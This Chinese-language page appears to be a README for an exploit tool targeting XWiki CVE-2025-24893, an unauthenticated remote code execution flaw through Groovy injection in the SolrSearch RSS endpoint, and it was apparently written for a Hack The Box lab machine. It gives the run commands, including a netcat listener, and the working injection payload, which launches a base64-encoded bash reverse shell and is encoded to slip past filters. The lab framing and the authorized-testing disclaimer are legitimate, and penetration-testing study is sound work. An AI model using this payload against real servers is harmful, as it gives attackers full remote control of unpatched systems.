XWiki CVE-2025-24893 未授权远程代码执行漏洞利用详解

本文详细介绍了针对XWiki CVE-2025-24893漏洞的未授权远程代码执行利用方法,涉及Groovy脚本注入、载荷构造与编码、以及通过SolrSearch RSS处理器触发漏洞的具体技术实现。

XWiki CVE-2025-24893 漏洞利用

针对 XWiki 中 CVE-2025-24893 漏洞的未授权远程代码执行利用程序,通过 Groovy 脚本注入实现。

漏洞概述

XWiki 版本早于 15.10.9 的系统中,存在一个通过 SolrSearch RSS 反馈处理器中的 Groovy 脚本注入导致的未授权远程代码执行漏洞。该漏洞的存在是因为 XWiki 未能正确清理 text 参数中的用户输入,使得攻击者能够跳出 RSS 上下文并注入任意的 Groovy 代码。

  • CVE ID: CVE-2025-24893
  • CVSS 评分: 9.8 (严重)
  • 受影响版本: XWiki < 15.10.9

功能特性

  • 简单的命令行界面
  • 自动生成并编码载荷
  • 使用 Base64 编码的反向 Shell 以绕过基本过滤器
  • 最小化依赖 (仅需 requests 库)

环境要求

1
pip3 install requests

使用方法

1
python3 exploit.py <target_url> <attacker_ip> <listener_port>

示例:

1
2
3
4
5
# 在攻击者机器上启动监听器
nc -lvnp 9001

# 运行漏洞利用程序
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

工作原理

  1. 构造一个 bash 反向 Shell 命令。
  2. 使用 Base64 对载荷进行编码。
  3. 通过模板注入 (}}}}}}{{{{groovy}}}}) 将其包装在 Groovy 代码中。
  4. 对载荷进行 URL 编码,同时保留必要的分隔符。
  5. /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> 发送 GET 请求。
  6. XWiki 处理恶意的 RSS 反馈并执行 Groovy 代码。

概念验证 (PoC)

该漏洞利用程序针对以下端点:

1
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

该漏洞允许跳出 RSS 反馈的上下文:

1
2
3
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

免责声明

本工具仅用于教育和授权的渗透测试目的。作者不对因使用此程序而造成的任何误用或损害负责。请仅针对您拥有所有权或已获得明确测试权限的系统使用此漏洞利用程序。

参考文献

许可证

MIT 许可证 - 详见 LICENSE 文件。

作者

为 HTB(Hack The Box)平台上的 “Editor” 靶机而创建。

注意:在测试任何系统之前,请务必确保您拥有适当的授权。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计